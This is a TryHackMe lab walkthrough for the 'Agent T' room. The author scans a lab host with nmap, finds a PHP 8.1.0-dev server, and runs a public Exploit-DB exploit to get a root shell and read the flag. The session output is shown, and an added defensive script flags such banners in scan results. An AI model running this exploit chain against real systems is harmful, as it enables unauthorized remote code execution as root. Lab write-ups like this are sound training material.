Agent T TryHackMe Walkthrough
Initial Enumeration
I started the initial enumeration by running a port scan using nmap looking for open ports and running services.
┌──(madhav__kali)-[~/ctf/thm/agentT]
└─$ nmap -sC -sV -oN nmap/initial 10.10.223.96
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-26 06:40 IST
Stats: 0:00:45 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
Nmap scan report for 10.10.223.96
Host is up (0.20s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http PHP cli server 5.5 or later (PHP 8.1.0-dev)
|_http-title: Admin Dashboard
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.88 seconds
We have only one HTTP port open which is running a PHP web server. Let's open our web browser and see what's running on the webserver.
I checked the website; it uses a Bootstrap theme and does not have much functionality. Next, I performed a dirb scan to search for hidden files and directories, but it did not give us anything useful either.
From the nmap scan, we know that the website is running a PHP cli server 5.5 or later (PHP 8.1.0-dev). I searched for this version name on Google and found that this version is vulnerable to remote code execution.
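A defender-side check for the same banner, as an added example that is not part of the original walkthrough: it parses nmap -sV normal output and flags an exposed PHP built-in server and pre-release PHP builds. The nginx line in the sample and the name audit_scan are constructed for illustration.

```python
import re

# Constructed sample: the service line from the scan above plus one
# made-up line for contrast (the nginx entry is not from the original scan).
SAMPLE_SCAN = """\
Nmap scan report for 10.10.223.96
PORT STATE SERVICE VERSION
80/tcp open http PHP cli server 5.5 or later (PHP 8.1.0-dev)
|_http-title: Admin Dashboard
8080/tcp open http nginx 1.22.1
"""

# <port>/<proto> open <service> <version text>, as printed by nmap -sV
SERVICE_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s+(.*)$")
# A PHP version with an optional pre-release suffix (-dev, alpha1, RC2, ...)
PHP_VERSION = re.compile(r"PHP (\d+\.\d+\.\d+)(-?(?:dev|alpha|beta|RC)\d*)?", re.I)


def audit_scan(text):
    """Return a list of (port, finding) tuples for risky PHP banners."""
    findings = []
    for line in text.splitlines():
        m = SERVICE_LINE.match(line.strip())
        if not m:
            continue  # script output, headers, non-open ports
        port, banner = int(m.group(1)), m.group(4)
        if "PHP cli server" in banner:
            # PHP's built-in server is documented as a development tool,
            # not something to expose on a network.
            findings.append((port, "PHP built-in development server exposed"))
        v = PHP_VERSION.search(banner)
        if v and v.group(2):
            # A suffix such as -dev marks a build that was never a release.
            findings.append(
                (port, f"pre-release PHP build {v.group(1)}{v.group(2)}"))
    return findings


if __name__ == "__main__":
    for port, finding in audit_scan(SAMPLE_SCAN):
        print(f"{port}/tcp: {finding}")
```

Run against saved scan files (for example the nmap/initial file written by -oN above), this gives an inventory of hosts that should be moved to a released PHP version behind a production web server.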
I found this exploit, written in Python, on Exploit-DB. On executing the exploit, I got a shell where we can execute commands as root!
┌──(madhav__kali)-[~/ctf/thm/agentT]
└─$ python3 exploit.py
Enter the full host url:
http://10.10.223.96/
Interactive shell is opened on http://10.10.223.96/
Can't acces tty; job crontol turned off.
$ id
uid=0(root) gid=0(root) groups=0(root)
We have the root shell; now we need to find the flag. I searched for flag.txt or root.txt and found a flag.txt in the / directory.
$ ls /
bin
boot
dev
etc
flag.txt
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
$ cat /flag.txt
flag{********************************}
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Delphine Wylin.